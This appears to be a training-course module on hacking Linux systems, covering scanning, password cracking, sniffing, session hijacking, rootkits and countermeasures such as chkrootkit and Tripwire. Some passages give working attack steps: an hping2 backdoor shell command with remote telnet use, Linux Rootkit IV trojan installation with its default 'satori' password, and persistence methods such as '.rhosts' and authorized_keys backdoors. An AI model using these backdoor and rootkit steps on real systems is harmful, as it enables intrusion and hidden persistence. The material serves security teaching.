Module Objectives

In this module we will be looking at hacking Linux systems. Linux is fast emerging as an affordable yet available operating system. As the popularity is growing so is the attention of players with malicious intent to break in to the systems. Therefore we intent to discuss various aspects dealing with hacking the Linux systems in this module. BY the completion of this module, you will be familiar with the following aspects:

• Why Linux?

• Compiling Programs in Linux

• Scanning Networks and Mapping Networks

• Password Cracking in Linux

• SARA

• TARA

• Sniffing

• A Pinger in disguise

• Session Hijacking

• Linux Rootkits

• IP Chains and IP Tables

• Linux Security Countermeasures

Why Linux?

• Majority of servers around the globe are running on Linux / Unix-like platforms

• Easy to get and Easy on pocket

• There are many types of Linux -Distributions /Distros / Flavors such as Red Hat, Mandrake, Yellow Dog, Debian etc.

• Source code is available

• Easy to modify.

• Easy to develop a program on Linux.

Linux is an operating system that can be downloaded free and "belongs" to an entire community of developers, not one corporate entity. With more and more people looking for an alternative to Windows , Linux has recently grown in popularity and is quickly becoming a favorite among major corporations and curious desktop users. Not only does it give users a choice of operating systems, it also proves itself valuable with its power, flexibility, and reliability.

Linux supports most of the major protocols, and quite a few of the minor ones. Support for Internet, Novell, Windows, and Appletalk networking have been part of the Linux kernel for some time now. With support for Simple Network Management Protocol and other services (such as Domain Name Service), Linux is also well suited to serving large networks. Since Linux was developed by a team of programmers over the Internet, its networking features were given high priority. Linux is capable of acting as client and/or server to any of the popular operating systems in use today, and is quite capable of being used to run Internet Service Providers.

Linux is an implementation of the UNIX design philosophy, which means that it is a multi-user system. This has numerous advantages, even for a system where only one or two people will be using it. Security, which is necessary for protection of sensitive information, is built into Linux at selectable levels. More importantly, the system is designed to multi-task. Whether one user is running several programs or several users are running one program, Linux is capable of managing the traffic.

Another huge advantage of an open system is a large number of software authors and beta testers. This makes the software testing and refinement process faster and better. Because there is not a lot of commercial software for Linux, most software written for Linux is written because the authors want to do it and there need be no compromise of quality.

Linux is "Free" in two senses. In one sense, the Linux consumer is free to modify the system and do anything he or she wishes with it. In another sense, acquiring Linux does not necessarily require any cash outlay at all.

There are two very popular methods for acquiring and distributing Linux: FTP and CD-ROM. Most of the major Linux distributions (Red Hat, Debian, Slackware, Caldera) are available for free download from several popular sites. Though time consuming, it does not cost anything beyond connection charges.

Linux is one of the more stable operating systems available today. This is due in large part to the fact that Linux was written by programmers who were writing for other programmers and not for the corporate system. There are currently two mature program packaging standards in the Linux world - SuSE and Mandrake. Debian and Red Hat each have their own packaging systems; both will check dependencies, both can upgrade an entire running system without a reboot. This makes it easy to upgrade parts or all of a system, as well as add new software, or remove unwanted software.

Compiling Programs in Linux

• There are generally 3 steps to compiling programs under Linux.

  1. Configuring how the program will be complied

  2. Compiling the program

  3. Installing the program

      $ ./configure $ make $ su Password $ make install $ exit 

The fact that Linux is an open source operating system means that there are efforts going on continuously to improve the system. Therefore if a user is downloading a file (which is bound to happen more often than not) to add functionality to his system, he will have to compile the file on his system. The following is a brief look into how this process takes place. It helps to remember, that most Linux programs are beta at best and there can and will contain errors or bugs . However, the percentage of programs that compile without problems has increased significantly recently.

 tar -xzvf / {path to file}/{filename.tar.gz} [Enter] 

and it will uncompress and untar. A quick explanation of the flags:

• x - untar the file

• z - uncompress the file

• v - verbose-commented

• f - What follows is the file the user wants to untar

For compiling, the user issues the "make" command. In order for "make" to start compiling, it must have a file named: Makefile.

There are three common ways to start the compile: simple, Imake, and configure.

Simple compile: If there is a file called Makefile - no Imake or configure files, this method is used to compile the file. This method of compiling has the most problems because nothing is configured to the computer.

 make [Enter] make install [Enter] 

and if all goes well, the program can be run.

Imake: This is an older way to compile. If on listing the directory there is an Imake file and no Makefile, this method is used.

 xmkmf [Enter] make [Enter] make install [Enter] 

Configure: this method of compiling if there is a file named configure in the directory. This is the easiest way to compile and probably has the highest chance of compiling correctly. Essentially it checks the entire system for every possible library and support file to ensure that the file can compile the program, and then creates the Makefiles with the correct information. To compile, type:

 ./configure [Enter] make [Enter] make install [Enter] 

The most common cause of not compiling is missing files. Almost all programs rely on support programs/files/libraries. If they are missing, the program cannot compile. The wrong version will kill just as much as not having it at all. The next most common problem is missing include files. Sometimes having multiple versions of the same library can cause problems as each version could put its header files in different places.

Scanning Networks

• Once the IP address of a target system is known, an attacker can begin the process of port scanning, looking for holes in the system through which the attacker can gain access.

• A typical system has 2^16 -1 port numbers and one TCP port and one UDP port for each number.

• Each one of these ports are a potential way into the system.

• The most popular Scanning tool for Linux is Nmap.

Scanning helps one to know what services are running on a machine. This will show the open ports on which services are listening for connections. Once the targets are identified, an intruder is able to scan for listening ports.

Port scanning is the process of connecting to TCP and UDP ports on the target system to determine what services are running or in a listening state. Identifying listening ports is essential to determine the type of operating system and application in use on the system.

Types of port scanning:

1. TCP connect scan: This type of scan connects to the target port and completes a full three-way handshake (SYN, SYN/ACK and ACK).

2. TCP SYN scan: This is also called half-open scanning because it does not complete the three-way handshake, rather a SYN packet is sent and upon receiving a SYN/ACK packet it is determined that the target machines port is in a listening state and if an RST/ACK packet is received , it indicates that the port is not listening.

3. TCP FIN scan: This technique sends a FIN packet to the target port and based on RFC 793 the target system should send back an RST for all closed ports.

4. TCP Xmas Tree scan: This technique sends a FIN, URG and PUSH packet to the target port and based on RFC 793 the target system should send back an RST for all closed ports.

5. TCP Null scan: This technique turns off all flags and based on RFC 793, the target system should send back an RST for all closed ports.

6. TCP ACK scan: This technique is used to map out firewall rule sets. It can help determine if the firewall is a simple packet filter allowing only established connections or a stateful firewall performing advance packet filtering.

7. TCP Windows scan: This type of scan can detect both filtered and non-filtered ports on some systems due to anomaly in the way TCP windows size is reported .

8. TCP RPC scan: This technique is specific to UNIX systems and is used to detect and identify Remote Procedure Call (RPC) ports and their associated program and version number.

9. UDP scan: This technique sends a UDP packet to the target port. If the target ports responds with an "ICMP port unreachable" message, the port is closed, if not then the port is open. This is a slow process since UDP is a connectionless protocol; the accuracy of this technique is dependent on many factors related to utilization of network and system resources.

Hacking Tool: Nmap

http://www. insecure .org/nmap

• Stealth Scan, TCP SYN

   nmap -v -sS 192.168.0.0/24 

• UDP Scan

   nmap -v -sU 192.168.0.0/24 

• Stealth Scan, No Ping

   nmap -v -sS -P0 192.168.0.0/24 

• Fingerprint

   nmap -v -0 192.168.0.0/24 #TCP 

Nmap is flexible in specifying targets. The user can scan one host or scan entire networks by pointing Nmap to the network address with a "/mask" appended to it. Targeting "victim/24" will target the Class C network, whereas "victim/16" will target the Class B. Nmap also allows the user to specify networks with wild cards, as in 192.168.7.*, which is the same as 192.168.7.0/24, or 192.168.7.1,4,5-16 to scan the selected hosts on that subnet.

Users are able to sweep entire networks looking for targets with Nmap. This is usually done with a ping scan by using the "-sP" flag. A TCP "ping" will send an ACK to each machine on a target network. Machines that are alive on the network will respond with a TCP RST. To use the TCP "ping" option with a ping scan, the "-PT" flag is included to specific port on the target network.

Nmap has been covered in detail in module three and readers are advised to refer to that to learn more about the OS fingerprinting and other scan options.

Scanning Networks

• One essential type of tool for any attacker or defender is the vulnerability scanner.

• These tool allow the attacker to connect to a target system and check for such vulnerabilities as configuration errors, default configuration settings that allow attackers access, and the most recently reported system vulnerabilities.

• The preferred open-source tool for this is Nessus.

• Nessus is an extremely powerful network scanner. It can also be configured to run a variety of attacks.

The 'Nessus' Project was started in early 1998, and first released in April 1998. The "Nessus" Project provides to the internet community a free, powerful, up-to-date and easy to use remote security scanner. Nessus allows the user to audit remotely a given network and determine whether attackers may break into it, or misuse it in some way.

There is also a multi-platform client written in Java. All communication between client and server is encrypted. The current Nessus database contains signatures for, and is therefore able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly-used web CGI scripts; additionally, the Nessus database detects DDoS zombies and Trojans. To scan hosts for vulnerabilities, install client and server, create a new server user, and connect. Problem reports generated by Nessus are easy to read and are exportable to other software.

Unlike many other security scanners, Nessus does not take anything for granted. That is, it will not consider that a given service is running on a fixed port. It will also not determine if security vulnerability is present by just regarding the version number of the remote service, but will really try to exploit it. Plugins are the core of Nessus because they contain a set of scripts to check vulnerabilities in a network, e.g., backdoors, DoS, wide-open ports, etc. These scripts are written in the language called NASL (Nessus Attack Scripting Language) and can be found in /usr/local/lib/nessus/plugin. The user can also develop their own scripts.

Cheops

Cheops is an Open Source Network User Interface. It is designed to be the network equivalent of a Swiss-army knife , unifying your network utilities. Cheops does for the network what a file manager does for the file system.

Cheops can optionally determine the OS of hosts on the network, selecting appropriate icons for them. Cheops can show the routes taken to access areas of the network. This feature is designed for larger networks, with routers, subnets, etc. This mapping not only makes hierarchy clearer, but can show unusual routing issues.

Cheops includes a generalized TCP port scanner to see what ports on the network are in use. It can be used to retrieve version information for certain services, to be sure any given host is up-to-date with the latest revision of its services.

Cheops includes a simple integrated SNMP browser, including write capability, using the UCD SNMP library. Cheops also supports a plug-in interface, which includes support for SNMP plug-ins, similar in concept to those of HP Openview.

Cheops can monitor critical servers, and immediately notify the concerned person through its event log, standard e-mail, and soon via paging, when things go wrong. The network administrator can know exactly which system is up or down, and just when problems occur. Right clicking on a host quickly shows a list of common services it supports, and rapid, easy access to them.

Port scan detection tools

• Scanlogd - detects and logs TCP port scans. http://www.openwall.com/scanlogd/

  Scanlogd only logs port scans. It does not prevent them. You will only receive summarized information in the system's log.

• Abacus Portsentry http://www.psionic.com/abacus/portsentry/

  Portscan detection daemon Portsentry has the ability to detect port scans (including stealth scans) on the network interfaces of your server. Upon alarm it can block the attacker via hosts.deny, dropped route or firewall rule.

PortSentry has a number of options to detect port scans, when it finds one it can react in the following ways:

• A log indicating the incident is made via syslog()

• The target host is automatically dropped into /etc/hosts. deny for TCP Wrappers

• The local host is automatically re-configured to route all traffic to the target to a dead host to make the target system disappear.

• The local host is automatically re-configured to drop all packets from the target via a local packet filter

PortSentry has four "stealth" scan detection modes. Method one uses a pre-defined list of ports to watch over. If someone pokes at them it activates. The second method is what I call "inverse" port binding. Where every port under a range is watched *except* for those that the system has bound for network daemons when the PortSentry starts or ones that you have manually excluded. This is a very sensitive way for looking for port probes, but also the most prone to false alarms.

scanlogd is a TCP port scan detection tool, originally designed to illustrate various attacks an IDS developer has to deal with. Scanlogd detects port scans and writes one line per scan via the syslog (3) mechanism. If a source address sends multiple packets to different ports in a short time, the event will be logged. The format of the messages is:

Saddr [: sport] to daddr [and others,] ports port [, port...], flags [, TOS TOS] [, TTL TTL] @HH:MM:SS

The fields in square brackets are optional; sport, TOS, and TTL will only be displayed if they were constant during the scan. The flags field represents TCP control bits seen in packets coming to the system from the address of the scan. It is a combination of eight characters , with each corresponding to one of the six defined and two reserved TCP control bits. Control bits that were always set are encoded with an uppercase letter, and a lowercase letter is used if the bit was always clear. A question mark is used to indicate bits that changed from packet to packet.

Scanlogd needs a way to obtain raw IP packets that either come to the system scanlogd is running on, or travel across a network segment that is directly connected to the system. Current versions of scanlogd can be built with support for one of several packet capture interfaces. As of version 2.0, scanlogd is aware of the raw socket interface on Linux, libnids, and libpcap. The use of libpcap alone is discouraged.

Password Cracking in Linux

• Xcrack

  (http://packetstorm.linuxsecurity.com/Crackers/)

• Xcrack doesn't do much with rules.

• It will find any passwords that match words in the dictionary file the user provides, but it won't apply any combinations or modifications of those words.

• It is a comparatively fast tool.

Xcrack is a simple dictionary based password cracking tool. It will find any passwords that match words in the dictionary file the user provide. It does not generate permutation combination of the words provided in the dictionary to arrive at the right password. For this reason, it is a comparatively faster tool, though efficacy might be less.

Hacking Tool: John the Ripper

http://www.openwall.com/john/

• John the Ripper require the user to have a copy of the password file.

• This is a relatively fast password cracker, and the most popular amongst the hacker community.

Cracking times, using the default dictionaries that come with the Linux system are as follows:

User ecc with password eccecc took less than a second

User root with password doodle took less than 2 seconds.

John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

SARA (Security Auditor's Research Assistant)

http://www-arc.com/sara

• The Security Auditor's Research Assistant (SARA) is a third generation Unix-based security analysis tool that supports the FBI Top 20 Consensus on Security.

• SARA operates on most Unix-type platforms including Linux & Mac OS X

• SARA is the upgrade of SATAN tool.

• Getting SARA up and running is a straight forward compilation process, and the rest is done via a browser.

When no primary_target(s) are specified on the command line, SARA starts up in interactive mode and takes commands from the HTML user interface.

When primary_target(s) are specified on the command line, SARA collects data from the named hosts, and, possibly, from hosts that it discovers while probing a primary host. A primary target can be a host name, a host address, or a network number. In the latter case, SARA collects data from each host in the named network.

SARA can generate reports of hosts by type, service, and vulnerability by trust relationship. In addition, it offers tutorials that explain the nature of vulnerabilities and how they can be eliminated.

By default, the behavior of SARA is controlled by a configuration file (config/sara.cf). The defaults can be overruled via command-line options or via buttons etc. in the HTML user interface.

Sniffit

• http://reptile.rug.ac.be/^ coder /sniffit/sniffit.html

• Sniffit is one of the most famous and fastest Ethernet sniffers for Linux.

• You can run it either on the command line with optional plug-ins and filters or in interactive mode, which is the preferred mode.

• The interactive mode of Sniffit allows you to monitor connections in real-time and therefore sniff real-time too!

Note	Remember to download the patch and then recompile Sniffit, for optimum results!

Sniffit can be run either on the command line with optional plug-ins and filters or in interactive mode, which is the preferred mode. The interactive mode of Sniffit allows monitoring connections in real-time.

Sniffers can only be run by root. Sniffers can only log packets that 'travel' on their Ethernet cable. Working with '-d' or '-a' give raw packets, they are still packed in IP, when logging to files, only send data is logged, the packets are 'unwrapped'.

Hacking Tool: HPing2

http://www.hping.org

• Hping is a command-line oriented TCP/IP packet assembly/analyzer.

• More commonly known for its use as a pinging utility, HPing carries a hidden but handy usage, that is a Backdoor Trojan.

• Just enter the following command on your victim

   $ ./hping2 -I eth) -9ecc  /bin/sh 

  Then Telnet into any port of your victim and invoke commands remotely on your victim's host by preceding any Unix/Linux commands with ecc

  $ telnet victim.com 80

  $ eccecho This Text imitates a trojan shovel

Session Hijacking

• Using a combination of sniffing and spoofing techniques, session hijacking tools allow an attacker to steal a valid, established login session.

• Examples of such sessions are Telnet and FTP sessions. With a successful session hijacking attempt, the victim's login session vanishes and he usually attributes it to network problems and logs in again.

• There are generally two types of Session Hijacking Techniques:

  1. Host-Based Session Hijacking

  2. Network-Based Session Hijacking

If attackers know the TCP/IP initial sequence number and the amount of traffic that has been sent, they may be able to close the TCP/IP session, hijack it, or inject arbitrary data. In this type of attack, it is not necessary for the attacker to know the next sequence number. They can send a flood of packets that contain likely sequence numbers so that the one packet containing the correct number will be accepted. If the set of possible sequence numbers is small enough, it becomes practical for an attacker to send packets set with all possible sequence numbers. The larger the available bandwidth of a system, the larger the set of packets can be.

To protect against these types of attacks, many operating systems use pseudo-random number generators to choose the TCP/IP initial sequence number for the TCP/IP session. However, many of these pseudo-random number generators are statistically weak and make sequence number-based attacks not just possible, but practical.

Host-Based Session Hijacking requires the attacker to have root on either source/destination machines. On a Linux system, the attacker uses a tool to interact with local terminal devices/ttys that are used in telnet sessions. If the attacker has root, he will then be able to read all session data from the target's tty and places key strokes into the tty. This is rarely used, as it requires the attacker to obtain root access on either machines.

This session-hijacking technique uses a sniffing technique on a segment of the network carrying traffic passing from the source to the destination to monitor the packets and the TCP sequence numbers. When the attacker decides to hijack a session, the attacker inserts traffic into the network with the source IP of the actual source instead of his own IP, placing the correct TCP sequence numbers on the packets.

This prompts the destination machine to think that the traffic came from legitimate source and follows the commands. And the attacker has hijacked the session. Note: Use of strong authentication cannot protect against successful Session hijackings; whereas encrypting the conversation offers some protection.

Session hijacking has been described in detail in the earlier modules. While the essence is the same, we will explore the various tools available to an attacker to do this in a Linux environment. Readers are advised to refresh the contextual information from the previous modules.

Hacking Tool: Hunt

http://lin.fsid.cvut.cz/^kra/index.html

• One of Hunt's advantages over other session hijacking tools is that it uses techniques to avoid ACK storms.

• Hunt avoids this ACK storm and the dropping of the connection by using ARP spoofing to establish the attacker's machine as a relay between Source and Destination.

• Now the Attacker uses Hunt to sniff the packets the Source and Destination sends over this connection. The Attacker can choose to acts as a relay and forward these packets to their intended destinations, or he can hijack the session.

• The attacker can type in commands that are forwarded to Destination but which the Source can't see. Any commands the Source types in can be seen on the Attacker's screen, but they are not sent to Destination. Then Hunt allows the attacker to restore the connection back to the Source when he/she is done with it.

Hunt is considered by security professionals to be one of the best session hijacking tools available as it is well written and has a comprehensive feature set. Hunt does not have the graphical interface of similar tools such as IPWatcher and T-sight, but the text based user interface is fairly easy to use and has the benefit of enabling Hunt to be used over a telnet session.

Hunt was developed by Pavel Krauz. Hunt's hijacking capabilities are primarily aimed at telnet and rlogin traffic and enable an attacker to view active sessions on an Ethernet LAN and then select one of them to hijack. Hunt is a program for intruding into a connection, watching it and resetting it. Note that hunt is operating on Ethernet and is best used for connections which can be watched through it. However, it is possible to do something even for hosts on another segment or hosts that are on switched ports.

ARP spoofing with Hunt

ARP enables systems to map IP addresses to the machine's physical addresses. ARP maps IP addresses to MAC addresses for systems connected to Ethernet LANs. Consider an illustrative scenario where Alice wants to send data to Bob.

Normally, if the ARP program on Alice finds a mapping for Bob's IP address in the ARP cache, it will allow Alice to address the data with Bob's MAC address and send it to him. Otherwise, the ARP program on Alice will send out an ARP request to all machines on the Ethernet segment. When Bob answers, Alice will send her data to Bob and will store Bob's MAC address in her ARP cache.

Sometimes it is possible for a machine to send out an ARP reply without an explicit ARP request. Usually, most systems accept this forged answer and update their ARP cache to accommodate it. This weakness allows ARP spoofing to take place.

Linux Rootkits

• One way an intruder can maintain access to a compromised system is by installing a rootkit.

• A rootkit contains a set of tools and replacement executables for many of the operating system's critical components , used to hide evidence of the attacker's presence and to give the attacker backdoor access to the system.

• Rootkits require root access to to install, but once set up, the attacker can get root access back at any time.

We revisit rootkits here basing our discussion on Linux rootkits. Conventionally, UNIX and Linux have been known to have rootkits built, as the intruder is aware of the code. Here we will focus on rootkits that use the LKM or Loadable Kernel Module.

A brief review: Rootkits appeared in the early 90's, and one of the first advisories came out in Feb 1994. This advisory from CERT-CC addressed "Ongoing Network Monitoring Attacks" CA-1994-01 revised on September 19, 1997. Rootkits have increased in popularity since then and are getting increasingly difficult to detect. The most common rootkits are used for SunOS and Linux operating systems. Rootkits contain several different programs. A typical rootkit will include an Ethernet Sniffer, which is designed to sniff out passwords. Rootkits can also include Trojan programs used as backdoors such as inetd or login. Support programs such as ps, netstat, rshd, and ls to hide the attacker directories or processes. Finally, log cleaners, such as zap, zap2, or z2, are used to remove login entries from the wtmp, utmp, and lastlog files. Some rootkits also enable services such as telnet, shell, and finger. The rootkit may also include scripts that will clean up other files in the /var/log and var/adm directories. Using the modified programs of ls, ps, and df installed on the box, the intruder can "hide" his/her files and programs from the legitimate system administrator.

The intruder next uses programs within the rootkit to clean up the extensive log files generated from the initial vulnerability exploitation. The intruder then uses the installed backdoor program for future access to the compromised system in order to retrieve sniffer logs or launch another attack. If a rootkit is properly installed and the log-files are cleaned correctly, a normal system administrator is unaware that the intrusion has even occurred until another site contacts him or the disks fill because of the sniffer logs.

The most severe threat to system security that can be caused by a rootkit comes from those that deploy LKM (Loadable Kernel Module) trojans. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation. Even if an infected system is rebooted, the LKM process will reload the Trojan during boot-up just like any other kernel module. Loadable Kernel Modules are used by many operating systems including Linux, Solaris, and FreeBSD.

The LKM rootkits facilitate the subversion of system binaries. Knark, Adore, and Rtkit are just a few of many LKM rootkits available today. As they run as part of the kernel, these rootkits are less detectable than conventional ones.

Let us see how a typical backdoor can be installed by an intruder.

The goal of backdoor is to give access to the hacker despite measures by the compromised system's administrator, with least amount of time and visibility. The backdoor that gives local user root access can be: set uid programs, trojaned system programs, cron job backdoor.

Set uid programs. The attacker may plant some set uid shell program in the file system, which when executed will grant the root to the attacker.

Trojaned system programs. The attacker can alter some system programs, such as "login" that will give him root access.

Cron job backdoor. The attacker may add or modify the jobs of the cron while his program is running so that he can get root access.

The backdoor that gives remote user root access can be: ".rhost" file ssh authorized keys, bind shell, trojaned service.

• ".rhosts" file. Once "+ +" is in some user's .rhosts file, anybody can log into that account from anywhere without password.

• ssh authorized keys. The attacker may put his public key into victims ssh configuration file "authorized_keys", so that he can log into that account without password.

• Bind shell. The attacker can bind the shell to certain TCP port. Anybody doing a telnet to that port will have an interactive shell. More sophisticated backdoors of this kind can be UDP based, or unconnected TCP, or even ICMP based.

• Trojaned service. Any open service can be trojaned to give access to remote user. For example, trojaned the inetd program creates a bind shell at certain port, or trojaned ssh daemon give access to certain password.

After the intruder plants and runs the backdoor, his attention turns to hiding his files and processes. However, these can be easily detected by the system administrator - especially if the system is running tripwire.

Let us see how a LKM rootkit helps achieve the attacker's needs.

In the case of LKM trojaned rootkits, the attacker can put LKM in /tmp or /var/tmp, the directory that the system administrator cannot monitor. Moreover, he can effectively hide files, processes, and network connections. Since he can modify the kernel structures, he can replace the original system calls with his own version.

• To hide files. Commands like "ls", "du" use sys_getdents() to obtain the information of a directory. The LKM will just filter out files such that they are hidden.

• To hide processes. In Linux implementations , process information is mapped to a directory in /proc file system. An attacker can modify sys_getdents() and mark this process as invisible in the task structure. The normal implementation is to set task's flag (signal number) to some unused value.

• To hide network connections. Similar to process hiding, the attacker can try to hide something inside /proc/net/tcp and /proc/net/udp files. He can trojan the sys_read () so that whenever the system reads these two files and a line matching certain string, the system call will not reveal the network connection.

• To redirect file execution. Sometimes, the intruder may want to replace the system binaries, like "login", without changing the file. He can replace sys_execve () so that whenever the system tries to execute the "login" program, it will be re-directed to execute the intruder's version of login program.

• To hide sniffer. Here we refer to hiding the promiscuous flag of the network interface. The system call to Trojan in this case is sys_ioctl().

• To communicate with LKM. Once the hacker has his LKM installed, he will attempt to modify some system calls such that when a special parameter is passed, the system call will be subverted.

• To hide LKM. A perfect LKM must be able to hide itself from the administrator. The LKM's in the system are kept in a single linked list. To hide a LKM an attacker can just remove it from the list so that command such as " lsmod " will not reveal it.

• To hide symbols in the LKM. Normally functions defined in the LKM will be exported so that other LKM can use them. An attacker can use a macro and put it at the end of LKM to prevent any symbols from being exported.

Linux Rootkit v4 (LR4)

• Linux Rootkit is IV the latest version of a well known trojan package for Linux system. The rootkit comes with following utility programs and trojaned system commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, oasswd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2

• In the example below we will try the change shell command (chsh). Compile only chsh in chsh-directory and use 'fix' to replace the original with the trojan version.

   $ make gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I - DSBINDER=\ "\" -DUSRSBINDER=\ "\" -DLOGDIR=\ "\" - DVARPATH=\ "\" chsh.c -o chsh.o gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I - DSBINDER=\ "\" -DUSRSBINDER=\ "\" -DLOGDIR=\ "\" - DVARPATH=\ "\" setpwnam.c -o setpwnam.o gcc -s -N chsh.o setpwnam.o -o chsh $../fix /usr/bin/chsh ./chsh ../backup/chsh 

• Once done, the chsh command will spawn a root shell to any user who logs on to the Linux System

Linux Rootkit IV is a very easy rootkit to use, and install. Installation of lrk4 included nothing more that executing the 'make install'. To install a shadow kit you execute the 'make shadow install'. Lrk4 will only work on Linux 2.X kernels . It is a package with sources to several trojaned system commands. When compiled and installed, they give the user running the command a root shell or some other useful functionality, like hiding certain processes, files, sockets etc. Some of special functionalities are initiated by given a secret password (default password in the package is 'satori') when the program asks for any specific thing, such as new shell, login name, password or whatever is specific to the command.

The user will need root-privileges to install most of those commands, since he will have to replace existing system files and usually set 'suid'-parameter for it. Therefore the attacker has to either root-compromise the victim computer or the local administrator has to accidentally install them. The rootkit comes with following utility programs and trojaned system commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2

Below is a short description of the utilities within lrk4.

1. - Modified programs that hide the intruder:

   • ls, find, du - these programs will not count or display the intruder files the data file is ROOTKIT_FILES_FILE, defaults to /dev/ptyr. NOTE: all files can be listed with the ' ls-/ ' if SHOWFLAG is enables. Will hide any files/directories with the names , ptyr, hack.dir, and W4r3z.

   • ps, top, pidof - these programs will not display the intruders processes

   • netstat -- will not display traffic from or to specified IP addresses, user-ids, or ports

   • killall - will not kill the intruders hidden processes

   • ifconfig - will not display the PROMISC flag when sniffer is running

   • crontab - will hide the crackers entries - the hidden crontab entry is in the /dev/hda02 by default

   • tcpd - will not log connections listed in the configuration file

   • syslogd -- will not log connections listed in the configuration file

2. - Trojaned programs with backdoors:

   • chfn - new full name enter password will drop rootshell

   • chsh - new shell enter password will drop rootshell

   • passwd - rootshell if is entered as current password

   • login - will allow the cracker to log in under any username with the rootkit password ( satori )-also if root is refused username ( rewt ) will work and will disable the history logging

3. - Trojaned network daemons:

   • inetd - rootshell listening on port 5002. the rootkit password most be entered in as the first line ( satori )

   • rshd - the username is the rootkit password, a root shell is bound to the port [ rsh (hostname) -l (rootkit password) ]

4. - Utilities:

   • FIX - replaces and fixes timestamp/checksum information on files

   • linsniffer - a packet sniffer

   • sniffchk - checks to make sure the sniffer alive

   • wted - wtmp/utmp editor

   • z2 - erases entries in the wtmp/utmp/lastlog entries for a username -will only null the entry

   • bindshell - binds a rootshell to a port (31337) by default

Rootkit Countermeasures

chkrootkit is a tool to locally check for signs of a rootkit.

It contains chkrootkit, a shell script that checks system binaries for rootkit modification.

http://www.chkrootkit.org/

The security of an unmodified Linux system depends on the correctness of the kernel, all the privileged applications, and each of their configurations. A problem in any one of these areas may allow the compromise of the entire system. In contrast, the security of a modified system based on the Security-enhanced Linux kernel depends primarily on the correctness of the kernel and its security policy configuration. While problems with the correctness or configuration of applications may allow the limited compromise of individual user programs and system daemons, they do not pose a threat to the security of other user programs and system daemons or to the security of the system as a whole.

Unless the intruder did a poor job of removing traces of his or her visit from the log files, attacks can be hard to detect. Most system administrators don't know their site has been invaded until they are contacted by someone at another site or their disks begin filling up due to the sniffer's logs. Some of the countermeasures apart from encryption are:

chkrootkit is a tool to locally check for signs of a rootkit. It contains:

• chkrootkit: a shell script that checks system binaries for rootkit modification.

• ifpromisc.c: checks if the network interface is in promiscuous mode.

• chklastlog.c: checks for lastlog deletions.

• chkwtmp.c: checks for wtmp deletions.

• check_wtmpx.c: checks for wtmpx deletions. (Solaris only)

• chkproc.c: checks for signs of LKM trojans.

• chkdirs.c: checks for signs of LKM trojans.

• strings.c: quick and dirty strings replacement.

Tripwire is a system integrity check tool that does not just look for "attack signatures". Tripwire first creates a database that monitors the binary signature, size, expected change of size, etc. Tripwire includes four cryptographic checksums of the content of each file that Tripwire uses to create the original database. When the software performs a system check, it will compare the system with the baseline of original database. If a modification has occurred Tripwire will alert the System Manager Station by a violation alert and the System Administrator by an email, the violation alert will show what files/directories were modified, added, or deleted.

Bastille Linux is a series of scripts which tighten up security on stock Linux systems, by changing permissions and disabling features. Taken to extreme, this will also prevent legitimate work and is more suitable for hardening a dedicated loghost or fileserver than a development system.

LIDS - Linux Intrusion Detection System - is a series of kernel patches that enable module and mountpoint locking. LIDS are available from LIDS.org.

dtk or "Deception Toolkit" is a kit of fake daemons and services designed to waste an intruder's time. dtk is available from all.net/dtk/example.html

Rkdet is a daemon intended to catch someone installing a rootkit or running a packet sniffer. It is designed to run continually with a small footprint under an innocuous name. When triggered, it sends email, appends to a logfile, and disables networking or halts the system.

Secure Linux project: The NSA has a Secure Linux project which includes mandatory access control architecture. The Security-enhanced Linux kernel enforces mandatory access control policies that confine user programs and system servers to the minimum amount of privilege they require to do their jobs. When confined in this way, the ability of these user programs and system daemons to cause harm when compromised (via buffer overflows or misconfigurations, for example) is reduced or eliminated. This confinement mechanism operates independently of the traditional Linux access control mechanisms. It has no concept of a "root" super-user, and does not share the well-known shortcomings of the traditional Linux security mechanisms (such as a dependence on setuid/setgid binaries).

chkrootkit detects the following rootkits

1. Irk3, irk4, Irk5, Irk6 (and some variants);

2. Solaris rootkit;

3. FreeBSD rootkit;

4. torn (including some variants and torn v8)

5. Ambient's Rootkit for Linus (ARK);

6. Ramen Worm;

7. rh[67]-sharper

8. RSHA;

9. Romanian rootkit;

10. RK 17; Lion Worm;

11. Adore Worm;

12. LPD Worm;

13. Keeny-rk;

14. Adore LKM;

15. ShitC Worm;

16. Omega Worm;

17. Wormkit Worm;

18. Maniac-RK;

19. Dsc-rootkit;

20. Ducoci rootkit;

21. x.c Worm;

22. RST.b trojan;

23. duarawkz;

24. knark LKM;

25. Monkit;

26. Hidrootkit; Bobkit;

27. Pizdakit;

28. torn (v8.0 variant);

29. Showtee;

30. Optickit;

31. T.R.K;

32. MithRa's Rootkit;

33. George;

34. SucKIT;

35. Scalper (FreeBSD/Apach echunked encoding worm);

36. Slapper A, B, C and D

37. (Linux/Apache mod_ssl Worm);

38. OpenBSD rk v1;

39. Illogic rootkit;

40. SK rootkit.

41. Sebek LKM;

42. Romanian rootkit;

43. LOC rootkit;

The following rootkits, worms and LKMs are currently detected:

Linux Firewall: IPChains

• IPChains is a very general TCP/IP packet filter, it allows you to ACCEPT, DENY, MASQ, REDIRECT, or RETURN packets.

• There are three chains that are always defined: input, output and forward.

• The chain is executed whenever a packet is destined for a network interface:

  • the output chain is executed whenever a packet is exiting a network interface, destined elsewhere

  • the forward chain is executed whenever a packet must traverse between multiple interfaces

• Chains are just rule sets that are executed in order, whenever a packet matches a rule then that specific target is executed.

ipchains is a rewrite of the well-known ipfwadm, which was a rewrite of BSD's ipfw, and was used to build firewalls in 2.0. x kernels. There are many reasons for this rewrite but perhaps the most important is ipfwadm couldn't allow protocols other than TCP, UDP or ICMP and it didn't handle fragments .

Example:

# ipchains -A input -j DENY -p all -l -s 127.0.0.0/8 -i etho -d 0.0.0.0/0

